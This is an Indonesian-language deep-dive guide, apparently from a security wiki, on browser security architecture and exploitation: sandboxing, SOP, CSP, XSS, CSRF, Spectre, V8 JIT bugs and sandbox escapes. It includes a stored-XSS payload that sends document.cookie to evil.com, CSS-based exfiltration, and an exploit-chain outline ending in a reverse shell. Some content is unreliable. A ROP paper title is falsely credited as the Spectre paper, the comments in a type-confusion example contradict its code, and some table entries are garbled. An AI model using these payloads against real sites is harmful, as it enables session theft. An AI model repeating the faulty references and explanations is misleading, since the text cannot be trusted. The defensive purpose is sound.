πŸ” Browser Security & Exploitation β€” Deep Dive

β€œThe browser is the new OS β€” and it’s under constant siege.”
Comprehensive guide to browser security architecture, web isolation models, client-side attacks, V8 engine exploitation, sandbox escape techniques, and the modern 0-day pipeline.

πŸ“‘ Daftar Isi


1. Arsitektur Multi-Process Chrome

Chrome menggunakan multi-process architecture sejak rilis pertama. Setiap tab, ekstensi, plugin, dan GPU process berjalan di proses OS masing-masing.

KomponenProsesPrivilege Level
BrowserBrowser ProcessHigh (system)
TabRenderer ProcessLow (sandbox)
GPUGPU ProcessMedium
EkstensiExtension ProcessVaried
NetworkNetwork Service ProcessMedium
UtilityUtility ProcessLow

Key concepts:

  • Process-per-site-instance: setiap tab bisa punya beberapa renderer process jika mengunjungi multiple sites.
  • Site Isolation: memastikan dokumen dari origin berbeda tidak pernah berada dalam process yang sama.
  • Navigation: browser process acts sebagai proxy β€” renderer tidak punya akses langsung ke network.
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚           Browser Process                β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”             β”‚
β”‚  β”‚   UI     β”‚  β”‚ Storage  β”‚             β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜             β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”             β”‚
β”‚  β”‚  Network β”‚  β”‚  Device  β”‚             β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜             β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Renderer 1    Renderer 2    Renderer 3 β”‚
β”‚ (low-risk)    (high-risk)   (isolated)  β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

2. Site Isolation & Security Boundaries

Site Isolation (aktif sejak Chrome 67, mandatory sejak Chrome 77) memisahkan dokumen dari different sites ke dalam proses yang berbeda.

Bagaimana Ini Bekerja

  1. Browser process menentukan β€œsite” berdasarkan scheme + registrable domain (eTLD+1).
  2. Setiap navigasi cross-site memicu renderer process baru.
  3. Data dari satu site tidak pernah dibagikan dalam memory address space yang sama dengan site lain.

Implikasi Keamanan

AncamanTanpa Site IsolationDengan Site Isolation
Spectre (data read)RawanDiblokir
Memory cross-readMungkinTidak mungkin
CSS/HTML leaksTerbatasSangat terbatas

Info

Site Isolation bukan sekadar security boundary β€” ia adalah architectural foundation untuk semua mitigasi side-channel di Chrome modern.

Out-of-Process Iframes (OOPIF)

Iframe cross-site juga mendapat proses terpisah. Ini penting untuk:

  • Security: iframe tidak bisa membaca memory parent
  • Stability: crash iframe tidak menumbangkan parent
  • Resource isolation: separate memory budget

3. Sandbox Architecture

Sandbox Chrome menggunakan restricted token pada Windows (atau sejenis di Linux/macOS). Renderer process berjalan dengan low integrity level.

Lapisan Sandbox

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚         OS Kernel / Hardware             β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚           Browser Process                β”‚ ◄── High Integrity
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚     Network Service / GPU Process        β”‚ ◄── Medium Integrity
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚        Renderer Process (Sandboxed)      β”‚ ◄── Low Integrity
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚       JavaScript / V8 (untrusted)        β”‚ ◄── No direct OS access
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Apa yang Diblokir di Sandbox

  • Tidak bisa fork() / CreateProcess()
  • Tidak bisa membaca file system kecuali direktori temporary
  • Tidak bisa network access langsung (via browser process proxy)
  • Tidak bisa akses display (window creation dibatasi)
  • Hanya bisa komunikasi via IPC channel dengan browser process

Mojo IPC

Komunikasi sandboxed ↔ browser process via Mojo β€” Chrome’s IPC system:

Renderer ◄───[Mojo IPC]───► Browser Process
    β”‚                              β”‚
    β”‚   Mojo Interface:            β”‚
    β”‚   - blink.mojom.*            β”‚
    β”‚   - network.mojom.*          β”‚
    β”‚   - storage.mojom.*          β”‚

4. V8 JavaScript Engine

V8 adalah high-performance JS engine Google, ditulis dalam C++, dengan pipeline:

Source Code (JS)
    β”‚
    β–Ό
Parser β†’ AST β†’ Ignition (Interpreter) β†’ Bytecode
    β”‚                                        β”‚
    β–Ό                                        β–Ό
TurboFan (JIT Compiler) ◄───────────── Hot code detected
    β”‚
    β–Ό
Optimized Machine Code

Komponen Kritis untuk Exploitation

KomponenFungsiAttack Surface
ParserParse JS ke ASTBugs di parsing regex, destructuring
IgnitionBytecode generator & interpreterType confusion di interpreter loop
TurboFanJIT compiler untuk hot codeMost targeted β€” optimization bugs
OrinocoGarbage collectorUse-after-free via GC race
MemoryHeap, stack, feedback vectorsOOB, type confusion, UAF

Pointer Compression

V8 menggunakan pointer compression untuk mengurangi memory usage. Pointer disimpan sebagai 32-bit offset dari heap cage base. Ini membatasi heap size tapi menambah kompleksitas exploitation.


5. Same-Origin Policy (SOP)

SOP adalah mekanisme fundamental yang membatasi akses antar dokumen dari origin berbeda.

Definisi Origin

Scheme  +  Host  +  Port
https   +  example.com + 443

Dua halaman dianggap same-origin jika ketiga komponen identik.

Apa yang Diblokir SOP

ResourceCross-Origin Access
DOM access (iframe)❌ Diblokir
Cookie read❌ Diblokir
LocalStorage❌ Diblokir
IndexedDB❌ Diblokir
Script executionβœ… Diizinkan
CSSβœ… Diizinkan
Imagesβœ… Diizinkan
<img> srcβœ… Diizinkan

SOP Bypasses

  • Open redirector β†’ leak via referrer headers
  • DNS rebinding β†’ ubah host DNS setelah SOP dicek
  • Universal XSS via browser extension
  • Protocol-based bypass (misal file: vs http:)

6. Cross-Origin Resource Sharing (CORS)

CORS adalah mekanisme yang melonggarkan SOP secara controlled.

Preflight Request

Untuk β€œnon-simple” requests (PUT, DELETE, custom headers, non-standard Content-Type), browser mengirim OPTIONS preflight:

OPTIONS /api/data HTTP/1.1
Origin: https://attacker.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: X-Custom-Header
 
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Methods: POST
Access-Control-Max-Age: 3600

Vulnerability Patterns

BugDampak
Access-Control-Allow-Origin: * + credentialsSemua origin bisa baca response
Wildcard *.evil.com mirroringRegex/RFI di balik proxy
Misconfigured Vary: OriginCache poisoning
null origin reflectionFile:// & data:// URI bisa bypass
Origin truncation bugshttps://evil.com.example.com dianggap aman

7. Content Security Policy (CSP)

CSP adalah defense-in-depth untuk mitigasi XSS dan data injection.

Direktif Utama

Content-Security-Policy:
  default-src 'self';
  script-src 'self' 'nonce-abc123';
  style-src 'self' 'sha256-...';
  img-src 'self' https://cdn.example.com;
  object-src 'none';
  base-uri 'none';
  frame-ancestors 'none';

Bypass Teknik

TeknikPrasyarat
JSONP endpoint di whitelistscript-src includes trusted CDN
File upload + 'self'Upload JS ke same-origin
Angular 1.x sandbox escapeLegacy framework CSP bypass
Base-uri injectionbase-uri tidak diset
CSS injection exfiltrationstyle-src terlalu longgar
Dangling markupimg-src mengizinkan image

Warning

CSP bukan silver bullet. Selalu kombinasikan dengan proper output encoding, input validation, dan HttpOnly cookies.

CSP Level 3

Fitur baru:

  • 'strict-dynamic' β€” script nonce/ hash yang di-load via script trusted juga dianggap trusted
  • 'unsafe-hashes' β€” inline event handler via hash
  • Reporting API (deprecating report-uri)

8. Cross-Origin Isolation (COOP, COEP, CORP)

Cross-origin isolation memungkinkan penggunaan SharedArrayBuffer dan performance.measureUserAgentSpecificMemory() dengan aman.

COOP β€” Cross-Origin Opener Policy

Cross-Origin-Opener-Policy: same-origin

Memisahkan window dari cross-origin opener. Ini mencegah:

  • window.opener dari origin berbeda
  • XS-Leaks via popup
  • Navigation-based leaks
ValueEfek
unsafe-noneDefault β€” no isolation
same-origin-allow-popupsMempertahankan opener untuk popup same-origin
same-originIsolasi penuh β€” references cross-origin hilang

COEP β€” Cross-Origin Embedder Policy

Cross-Origin-Embedder-Policy: require-corp

Mewajibkan semua resource di halaman memiliki Cross-Origin-Resource-Policy yang sesuai.

CORP β€” Cross-Origin Resource Policy

Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Resource-Policy: same-site

9. Cross-Site Scripting (XSS) β€” Advanced

Reflected XSS

Payload langsung di response tanpa encoding:

/search?q=<script>alert(1)</script>

Stored XSS

Payload tersimpan di database, dieksekusi saat data ditampilkan:

-- Contoh: komentar forum dengan payload
INSERT INTO comments VALUES ('<img src=x onerror="fetch(\"https://evil.com/steal?c=\"+document.cookie)">');

DOM-based XSS

Payload dieksekusi via client-side JavaScript tanpa server involvement:

// Vulnerable code
const name = new URLSearchParams(location.search).get("name")
document.getElementById("greeting").innerHTML = name // XSS!

Mutation XSS (mXSS)

Memanfaatkan parser mutation β€” perbedaan antara DOM tree yg dihasilkan browser dengan yg diharapkan sanitizer:

<noscript><p title="</noscript><img src=x onerror=alert(1)>"></p></noscript>

Server-Side Template Injection (SSTI)

Ketika attacker dapat menginjeksi template directive ke server:

// Node.js + pug β€” vulnerable
app.get("/", (req, res) => {
  res.render("template", { name: req.query.name })
})
// Payload: #{7*7} β†’ 49

10. DOM Clobbering & mXSS

DOM Clobbering

Memanfaatkan HTML element id / name untuk overwrite JavaScript variable:

<!-- Global scope pollution -->
<a id="config"></a>
<base id="URL" />
<form name="body"></form>
 
<script>
  // If developer checks if (config) β€” truthy karena element
  if (config) {
    loadConfig(config.href) // dapat mengontrol URL
  }
</script>

Scriptless XSS

Menggunakan CSS injection + DOM clobbering tanpa <script>:

/* Inject CSS */
input[value^="admin"] {
  background: url(https://evil.com/leak?char=a);
}

mXSS (Mutation XSS) β€” Deep Dive

mXSS bekerja karena perbedaan antara parser HTML (DOM API vs innerHTML serialization):

StageDeskripsi
1. Input<details><p title="</details><img src=x onerror=alert(1)>
2. Sanitizer (innerHTML)Membaca HTML string β€” </details> dianggap string biasa
3. Browser re-parser</details> diinterpretasi sebagai tag β€” mutation terjadi
4. DOM<img> terbentuk sebagai element baru dengan event handler

Mitigasi: gunakan DOMPurify dengan konfigurasi RETURN_DOM_FRAGMENT.


11. Cross-Site Request Forgery (CSRF)

CSRF memaksa browser korban mengirim request ke aplikasi target tanpa sepengetahuan korban.

Mekanisme

  1. Korban login ke bank.com β€” session cookie diset
  2. Korban browsing ke evil.com
  3. evil.com memuat image/form yang POST ke bank.com/transfer?amount=1000
  4. Cookie otomatis dikirim karena same-origin untuk cookie

CSRF Token Pattern

// Server memberikan CSRF token dalam session
// Setiap form mengandung token ini
<input type="hidden" name="csrf_token" value="x7k2m9..." />

Bypass Teknik

TeknikCara Kerja
Token predictionToken lemah (timestamp-based)
Cookie injectionSet cookie di subdomain
Referer-based bypassHapus/masking referer header
Double submit bypassIf cookie = parameter, inject cookie
JSON CSRFContent-Type: application/json lewat XHR

XS-Leaks (Cross-Site Leaks) adalah kelas attack yang mengeksploitasi timing, size, dan error status dari cross-origin requests untuk menginfer informasi.

Vectors

TeknikYang Dileak
Timing leakResponse time β†’ data existence
Frame countwindow.length β†’ jumlah iframe
Cache probingResource cache β†’ visited status
Error eventsonload / onerror β†’ resource exists
Idle detectionUser activity status
CSS injection leakAttribute selectors β†’ CSRF token chars

Cross-Site Search (XSSearch)

Menentukan apakah user memiliki akun di suatu service:

// Bruteforce search API β€” timing-based
for (const email of emails) {
  const start = performance.now()
  await fetch(`https://target.com/api/search?q=${email}`)
  const elapsed = performance.now() - start
  if (elapsed > THRESHOLD) console.log("Found:", email)
}

Mitigasi

  • SameSite=Lax atau SameSite=Strict pada cookies
  • Cross-Origin isolation (COOP + COEP)
  • Sec-Fetch-* headers
  • fetch metadata (Sec-Fetch-Site, Sec-Fetch-Mode)

13. Side-Channel Attacks: Spectre, Meltdown, Cache

Side-channel attack mengeksploitasi microarchitectural state CPU (cache, branch predictor) untuk mengakses data yang seharusnya tidak bisa diakses.

Spectre (Variant 1 & 2)

// Spectre v1 β€” Bounds Check Bypass
if (x < array1_size) {
  // CPU speculative execution: jalankan meski x > array1_size
  int y = array2[array1[x] * 4096];
  // y mempengaruhi cache β†’ diukur via timing
}
VariantNamaTarget
v1Bounds Check BypassArray bounds
v2Branch Target InjectionIndirect branch predictor
v3Meltdown (Rogue Data Cache Load)Kernel memory
v4Speculative Store BypassStore queue

Cache Timing Attacks

// In browser: timing measurement via performance.now()
const start = performance.now()
// ... access sensitive data ...
const delta = performance.now() - start
// delta ~~ cache hit? data berada di address tersebut
MitigationImplemented In
Site IsolationChrome 67+
Reduced timer precisionAll browsers (Chrome 69+)
Cross-Origin Read BlockingChrome
SharedArrayBuffer gatingRequires COOP+COEP
Β΅op cache partitioningChrome (Intel only)

Info

SharedArrayBuffer telah di-re-enable sejak Chrome 92, tetapi hanya untuk situs yang mengirim COOP+COEP headers.


14. V8 Exploitation β€” JIT Bugs & Type Confusion

JIT compiler adalah attack surface terbesar di V8 karena ia menghasilkan dan mengeksekusi kode native dari JavaScript.

Turbofan Optimization Pipeline

JavaScript
    ↓
Bytecode (Ignition)
    ↓
Tier 0 β€” Unoptimized (Ignition)
    ↓ (hot code detected)
Tier 1 β€” Turbofan (Optimized)
    ↓ (deoptimization if assumptions wrong)
Tier 0 β€” Re-optimized or fallback

Type Confusion via JIT

Developer membuat asumsi type berdasarkan feedback vectors. Jika asumsi salah, terjadi type confusion:

// Contoh simplifikasi JIT type confusion
function confuse(arr, i, val) {
  // Turbofan mengasumsikan arr selalu array of Smis
  arr[i] = val // Jika val adalah object β†’ type confusion
}
 
let arr = [1.1, 2.2, 3.3]
confuse(arr, 0, 1.4) // Warmup β€” Smi + Double
confuse(arr, 0, 1.4) // Warmup lagi
confuse(arr, 0, 1.4) // Turbofan compiles
confuse(arr, 0, { x: 0x41414141 }) // BOOM β€” type confusion!

Escape Analysis Bug

Ketika Turbofan gagal melakukan escape analysis dengan benar, object yang seharusnya di stack bisa diakses via pointer yang sudah tidak valid, menyebabkan Use-After-Free (UAF).

Key Exploit Primitives

PrimitiveDeskripsi
addrofMendapatkan address heap dari JS object
fakeobjMembuat pointer JS dari arbitrary address
Arbitrary readMembaca memory di address tertentu
Arbitrary writeMenulis memory di address tertentu
Code executionMengontrol RIP via corrupted function pointer

15. V8 Exploitation β€” OOB & RCE

Out-of-Bounds (OOB) Access

OOB terjadi ketika index array melampaui allocated bounds:

// CVE-2021-30517 β€” OOB in Turbofan
function oob_read(arr, idx) {
  // Turbofan mengeliminasi bounds check karena
  // menganggap idx selalu < arr.length (berdasarkan warmup)
  return arr[idx]
}

Exploitation strategy:

  1. OOB read β†’ leak Map pointer dari adjacent objects
  2. Fake obj construction β†’ overwrite elements pointer
  3. Arbitrary read/write on V8 heap
  4. Overwrite WASM RWX page β†’ shellcode

WASM RZX/RWX

V8 mengalokasikan RWX memory pages untuk WebAssembly compilation. Ini adalah target utama exploitation:

// WASM module β†’ V8 alokasi RWX page
const wasmCode = new Uint8Array([0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00])
const wasmModule = new WebAssembly.Module(wasmCode)

Exploit chain:

  1. Dapatkan arbitrary read/write via OOB + type confusion
  2. Find WASM RWX page address
  3. Tulis shellcode ke RWX page
  4. Panggil WASM function β†’ shellcode executes

Modern Mitigations

MitigationDescription
Pointer compressionHeap pointer adalah 32-bit offset
V8 SandboxIsolated heap, pointer table indirection
Sandboxed pointersAll pointers via handle table
CET (Control-flow Enforcement)Shadow stack, indirect branch tracking
CFG (Control Flow Guard)Windows-only

16. Sandbox Escape Techniques

Sandbox escape adalah langkah setelah mendapatkan code execution di renderer process β€” tujuan: pindah ke browser process atau system.

Attack Surface

VectorTarget
IPC Mojo interfacesBrowser process services
File system accessSymlink race, temp file abuse
Network serviceConnect to internal services
GPU compositorShared memory corruption
Service WorkersPersistence via SW
Browser extensionsHigh-privilege extension API

Mojo IPC Bug

Mojo interfaces didefinisikan di .mojom files. Jika ada type confusion di de-serialization:

Renderer β†’ Mojo message to BrowserProcess
               β”‚
               β–Ό
        Mojo parser β†’ type confusion β†’ OOB write
               β”‚
               β–Ό
        Code execution di browser process

Notable Escapes

TahunCVETeknik
2019CVE-2019-13720Use-after-free in Audio component
2020CVE-2020-16040Type confusion in Turbofan + Mojo IPC
2021CVE-2021-30551OOB in Turbofan β†’ Sandbox bypass via Mojo
2022CVE-2022-2294Heap overflow in WebRTC
2023CVE-2023-3079UAF in V8 β†’ Sandbox escape via SharedArrayBuffer

Common Escape Patterns

  1. Renderer compromise: Code execution via V8 exploit
  2. Mojo interface find: Enumeration of available Mojo IPC endpoints
  3. IPC privilege escalation: Abuse privileged Mojo service
  4. File write: Write to Downloads/ or temp dir β†’ binary planting
  5. Second-stage: Download and execute native payload

17. Chrome Extension Security

Extension Architecture

Extension
 β”œβ”€β”€ Manifest (manifest.json)
 β”œβ”€β”€ Background script (persistent/event-driven)
 β”œβ”€β”€ Content scripts (injected into pages)
 β”œβ”€β”€ Popup / Options pages
 └── Native messaging host (optional, high privilege)

Permission Model

PermissionAccess granted
activeTabCurrent tab only
<all_urls>All web pages
storageExtension storage API
nativeMessagingSystem native binary (RCE risk)
webRequestIntercept & modify network traffic
debuggerChrome DevTools Protocol β€” powerful

Common Extension Vulnerabilities

VulnerabilityDampak
External script-src injectionXSS via CDN
PostMessage listenerData exfiltration
Insecure nativeMessagingHost binary β€” arbitrary command exec
webRequest manipulationTraffic interception
Content script evalDOM access β€” same as XSS
Permission creepRequest excessive permissions

Malware Patterns

  • Manifest v2 β†’ v3 migration abuse: webRequestBlocking removal pushed malware to declarativeNetRequest
  • Drive-by extension install: via enterprise policy or deceptive consent
  • Cookie thief extension: cookies.getAll() β€” massive data theft

18. Zero-Day Discovery Pipeline

Fullchain vs Single Component

Single bug (e.g., V8 RCE)
    β”‚
    β–Ό
Renderer compromise
    β”‚
    β–Ό
+ Sandbox escape bug
    β”‚
    β–Ό
Full chain exploit

Discovery Approaches

MethodDescription
Manual code reviewAudit V8 Turbofan, Mojo, WebAudio, WebGPU
Differential fuzzingCompare two builds to find security fixes
Patch diffingAnalisis commit messages + patches
Bug bounty triageReports dari external researchers
Exploit predictionML-based prediction of vulnerable code paths

Patch Gap

Rata-rata patch gap (public commit β†’ public exploit):

ComponentAverage Gap
V8 Turbofan5-14 days
WebAudio7-21 days
Mojo IPC14-30 days
Site Isolation30-90 days

19. Bug Bounty to Exploit β€” The Full Chain

Proses dari menemukan bug hingga exploit siap:

Stage 1: Recon & Target Selection

# Target Mojo interfaces
find chromium/src -name "*.mojom" | xargs grep -r "interface"
 
# Target Turbofan
Search for "Simp" (Simplified Lowering), "LoadElimination", "BoundsCheckElimination"
 
# Patch history
git log --oneline --all --grep="security" -- v8/src/compiler/

Stage 2: Trigger Identification

  1. Code path yang bisa dieliminasi bounds check-nya
  2. Function yang menerima input dari JS tanpa validasi cukup
  3. Map transition yang tidak diperhitungkan di optimization phase

Stage 3: PoC Development

// Minimal PoC structure
function trigger(arr) {
  // 1. Patch Turbofan assumptions
  // 2. Trigger type confusion or OOB
  // 3. Verify crash / corrupted state
}
 
// Warmup
for (let i = 0; i < 100000; i++) {
  trigger([1.1, 2.2])
}
 
// Trigger
trigger([1.1, 2.2])
print("PoC executed")

Stage 4: Exploit Chain Construction

  1. Leak β†’ addrof + fakeobj
  2. Arbitrary R/W β†’ corrupted backing store
  3. WASM RWX β†’ shellcode injection
  4. Sandbox escape β†’ Mojo IPC abuse
  5. Payload β†’ reverse shell / beacon

Stage 5: Weaponization

  • ROP chain construction
  • CFI / CET bypass
  • Anti-debugging / sandbox detection
  • Payload persistence

20. Case Studies β€” Pwn2Own & Chrome 0-Days

Pwn2Own Vancouver 2023 (Manfred Paul)

Full chain: Safari renderer β†’ macOS kernel

  • Renderer bug: TYPE CONFUSION in JavaScriptCore B3 JIT compiler
  • Sandbox escape: XPC service vulnerability
  • Kernel exploit: Race condition in XNU kernel

Chrome 0-Day β€” CVE-2021-21224 (in the wild)

Type confusion in V8 Turbofan

  • Component: JSTypedArray constructor with length getter
  • Trigger: Array.from() dengan custom getter on length
  • Impact: Remote code execution in renderer process
  • Detection: Chrome’s own fuzzing infrastructure

Chrome 0-Day β€” CVE-2022-2294 (in the wild)

Heap overflow in WebRTC

  • Component: WebRTC video capture
  • Trigger: Malformed SDP offer
  • Impact: Sandbox escape (memory corruption in browser process)
  • Patch: Additional size validation in RTP packet parsing

Cascade (2023 β€” Google Project Zero)

Full chain exploit chain:

BugComponentImpact
1V8 TurbofanRCE in renderer
2Mojo serviceSandbox escape
3KernelPrivilege escalation

Dikembangkan sebagai β€œin-the-wild” simulation untuk mengukur detection capabilities.


21. WebAuthn & Credential Security

WebAuthn (FIDO2) Flow

  Browser ───────────────► Server
     β”‚                         β”‚
     β”‚  challenge              β”‚
     │◄────────────────────────│
     β”‚                         β”‚
     β”‚  Create credential       β”‚
     β”‚  (navigator.credentials) β”‚
     β”‚                         β”‚
     β”‚  Attestation Object      β”‚
     │────────────────────────►│
     β”‚                         β”‚
     β”‚  Verify signature        β”‚
     β”‚                         β”‚

Attack Surface

AttackDescription
Phishing-resistant bypassMan-in-the-middle proxy authentication
CTAP HID injectionUSB HID keyboard β†’ fake security key
Platform credential cloningTPM extraction
WebAuthn protocol downgradeForce U2F instead of FIDO2

Credential Leak Vectors

  • autocomplete="webauthn" β€” autofill abuse
  • Conditional UI timing attacks
  • Credential ID enumeration

22. Browser Fingerprinting & Anti-Detection

Canvas Fingerprinting

const canvas = document.createElement("canvas")
const ctx = canvas.getContext("2d")
// Render text + shapes (GPU-specific differences)
ctx.fillText("Fingerprint", 10, 50)
const fingerprint = canvas.toDataURL()

WebGL Fingerprinting

GPU driver quirks, rendering differences, extensions support β†’ highly unique.

Audio Fingerprinting

AudioContext β†’ oscillator characteristics per hardware.

Known Anti-Detection Tools

ToolApproach
Playwright/StealthPatch detection scripts
Puppeteer ExtraPlugin-based evasion
Headless ChromeNo GPU, limited feature set
Tor BrowserUniform fingerprint per user agent
BraveFingerprinting randomization

23. Fuzzing Browser Targets

Coverage-Guided Fuzzing

Instrumented binary
    β”‚
    β–Ό
Seed corpus β†’ Mutation engine β†’ New input
    β”‚                              β”‚
    β–Ό                              β–Ό
Executor (testcase)          Code coverage feedback
    β”‚                              β”‚
    β–Ό                              β–Ό
Crash analysis ◄────────── Interesting seeds

Tools & Frameworks

ToolTarget
libFuzzerV8, libxml, libpng (OSS-Fuzz)
AFL++Broader targets
DomatoDOM API fuzzer
Grammar-basedJavaScript engine parser
DifferentialCompare multiple browser outputs

Fuzzing V8

# Build V8 with coverage instrumentation
tools/dev/v8gen.py x64.release -- v8_fuzztest=true
 
# Run fuzztest
./out/x64.release/v8_fuzztest --fuzz=...
 
# OSS-Fuzz integration
# Continuous fuzzing via ClusterFuzz

Domato β€” DOM Fuzzing

# Configurasi generator
generator.setConfig('MAX_DEPTH', 10)
generator.addRule('createElement', 'createElement("%s")')
generator.addTemplate('document.body.appendChild(%s)')

24. Mitigation & Hardening Guide

Web Developer Actions

ActionBenefit
Implement strict CSP (strict-dynamic)Mitigate XSS, bahkan jika ada injection
HttpOnly + Secure + SameSite cookiesMencegah cookie theft & CSRF
Cross-Origin isolation (COOP+COEP)Enable SharedArrayBuffer, prevent XS-Leaks
X-Content-Type-Options: nosniffPrevent MIME sniffing
Referrer-Policy: strict-originLimit referrer leakage
Input sanitization (DOMPurify)Prevent stored/reflected XSS
Subresource Integrity (SRI)Ensure CDN scripts are not tampered

Enterprise Hardening

PolicyDescription
Block extensions with <all_urls>Reduce permission creep
Force SameSite=Lax via enterprise policyMitigate CSRF cross-browser
Enable Site IsolationChrome built-in, ensure no disabling
Disable WebAssemblyReduce V8 RWX attack surface
Application Guard (Edge)Container-based isolation
Security Product IntegrationEndpoint detection & response

25. References & Further Reading

Papers

TitleAuthorsYear
The Geometry of Innocent Flesh on the BoneKocher et al. (Spectre)2018
MeltdownLipp et al.2018
Cross-Site Search AttacksSchwenk et al.2017
V8 Ignition: An Interpreter for V8Google2016

Repositories

Tools

ToolPurpose
DOMPurifyXSS sanitizer
XS-Leaks WikiXS-Leaks reference
DomatoDOM fuzzer
FridaDynamic instrumentation
GDB with V8 helpersV8 debugging
Retired.pwCTF browser exploit archive

Lihat juga: web-hacking-exploitation, comprehensive-threat-directory, zero-taxonomy-security, digital-privacy-anonymity


Last updated: 2026-07-02 | Browser Security & Exploitation Deep Dive